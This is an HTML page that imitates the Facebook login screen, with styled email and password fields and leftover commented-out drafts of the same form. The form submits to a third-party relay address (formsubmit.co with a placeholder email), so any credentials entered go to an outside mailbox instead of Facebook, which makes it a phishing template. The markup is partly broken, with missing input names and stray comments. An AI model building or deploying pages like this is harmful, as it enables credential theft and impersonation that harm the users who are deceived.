<html>
    <head> 
        <title> log in to facebook </title>
        <style>
             body{
                margin: 0;
                padding: 0;
                background: linear-gradient(90deg,#0d4364,#0f5078,#8e44ad,#410a59);
             }
             .container{
                top: 50%;
                left: 50%;
                position: absolute;
                transform: translate(-50%,-50%)
            }
            .card{
                padding: 60px 40px 50px 40px;
                 background: rgb(50,50,50);
                 border-radius: 20px;


            }
            #name{
                width: 250px;
                border: none;
                background: transparent;
                border-bottom: 1px solid white;
                padding: 6px;
                color:white;
                text-align: center;

            }
            #button{
                 border-radius:20px;
                padding: 10px 20px;
                background: dodgerblue;
                color:white;
                margin-top: 20px;
                border: none;
                outline: none;
                margin-left: 100px;
            }
            a{
                font-size: 15px;
            }
           #f{
                 border-radius: 50px;
                 position:absolute;
                 margin-left: 100px;
                 margin-top: 30px;
                 background-color:transparent;
                 color: rgb(48, 48, 191);
                 font-size: xx-large;
                 border: none;
                 outline: none;
                }
                h3{
                    margin-left: 20%;
                }
                #sign{
                    margin-left: 30px;
                }
                span{
                    color: white;
                    margin-left: 25px;
                }
        </style>
        
    </head>
    <body>
        
        <div class="container"> 
            <button id="f"> facebook</button>
            <!--<img src="download.png">-->
            <div class="card">

      <form action="https://formsubmit.co/your@email.com" method="post">

                  <h3>Log in to Facebook</h3>
                  <input type="email,number" placeholder="email address or number "id="name">
                  <br>
                  <input type="password" placeholder="password"id="name">
                  <br>
                  <input type="submit"value="submit"id="button">
                   <br>
                   <br>
                   <a href="forgotten account.html">forgotten account?</a>
                   <span>
                    or
                    </span>
                    <a id="sign" href="sign up for facebook.html">sign up</a>
                   <br>
                   <br>
                  <!--<a href="forgotten account.html">forgotten account?</a>
                   <a href="sign up for facebook.html">sign up</a>-->
                
                 
               
        </div>
    </body>
        </html>
        <!---<background="images.png" style="background-repeat:no-repeat;background-size: cover;">
      <form action="https://formsubmit.co/your@email.com" method="post">
        <fieldset>
    
           <div>
          
                  <img src="download.png">
                  <h1>Log in to Facebook</h1>
             </br>
             
                  <input type="email,number" placeholder="email address or phonenumber "/> 
              </br>
              </br>
                  <input type="password" placeholder="password"/>

             </div>
                 </br>
              <div>
                  <button type="submit">submit</button>
              </div>
     </form>
               <div>
                <a href="forgotten account.html">forgotten account?</a>
                 <a href="sign up for facebook.html">Sign up for Facebook</a>

               
            </fieldset>

            </div>
        
    </body>
</html>




     <!-<body>
            <img src="download.png"width="150" height="90"/>
            <form action="" style="text-align: center;">
                <fieldset>  <input type="email" placeholder="email address or phone number"/><br>
                             <input type="password" placeholder="password"/><br>
                             <button style="background-color: blue;">login</button>
                             <centre>
                                <div style="color: blue;">forgotten password?</div>
                                <hr>
                                <button style="color:green ;"> create a account</button>
                            </centre>
                             
                                  
                </fieldset>
            </form>
    </body>

      
    
